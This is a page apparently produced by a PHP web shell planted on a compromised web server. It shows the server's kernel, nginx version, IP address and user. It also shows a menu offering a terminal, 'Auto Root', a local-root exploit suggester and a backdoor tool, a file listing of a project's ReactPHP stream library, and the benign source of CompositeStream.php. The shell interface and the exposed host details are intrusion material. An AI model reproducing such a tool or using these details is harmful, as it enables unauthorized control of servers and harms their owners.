Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.19.255.50
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
vendor /
react /
stream /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
CompositeStream.php
1.83
KB
-rw-r--r--
2020-05-04 10:17
DuplexResourceStream.php
6.64
KB
-rw-r--r--
2020-05-04 10:17
DuplexStreamInterface.php
1.68
KB
-rw-r--r--
2020-05-04 10:17
ReadableResourceStream.php
5.58
KB
-rw-r--r--
2020-05-04 10:17
ReadableStreamInterface.php
13.9
KB
-rw-r--r--
2020-05-04 10:17
ThroughStream.php
4.81
KB
-rw-r--r--
2020-05-04 10:17
Util.php
2.23
KB
-rw-r--r--
2020-05-04 10:17
WritableResourceStream.php
4.98
KB
-rw-r--r--
2020-05-04 10:17
WritableStreamInterface.php
14.4
KB
-rw-r--r--
2020-05-04 10:17
Save
Rename
<?php namespace React\Stream; use Evenement\EventEmitter; final class CompositeStream extends EventEmitter implements DuplexStreamInterface { private $readable; private $writable; private $closed = false; public function __construct(ReadableStreamInterface $readable, WritableStreamInterface $writable) { $this->readable = $readable; $this->writable = $writable; if (!$readable->isReadable() || !$writable->isWritable()) { $this->close(); return; } Util::forwardEvents($this->readable, $this, array('data', 'end', 'error')); Util::forwardEvents($this->writable, $this, array('drain', 'error', 'pipe')); $this->readable->on('close', array($this, 'close')); $this->writable->on('close', array($this, 'close')); } public function isReadable() { return $this->readable->isReadable(); } public function pause() { $this->readable->pause(); } public function resume() { if (!$this->writable->isWritable()) { return; } $this->readable->resume(); } public function pipe(WritableStreamInterface $dest, array $options = array()) { return Util::pipe($this, $dest, $options); } public function isWritable() { return $this->writable->isWritable(); } public function write($data) { return $this->writable->write($data); } public function end($data = null) { $this->readable->pause(); $this->writable->end($data); } public function close() { if ($this->closed) { return; } $this->closed = true; $this->readable->close(); $this->writable->close(); $this->emit('close'); $this->removeAllListeners(); } }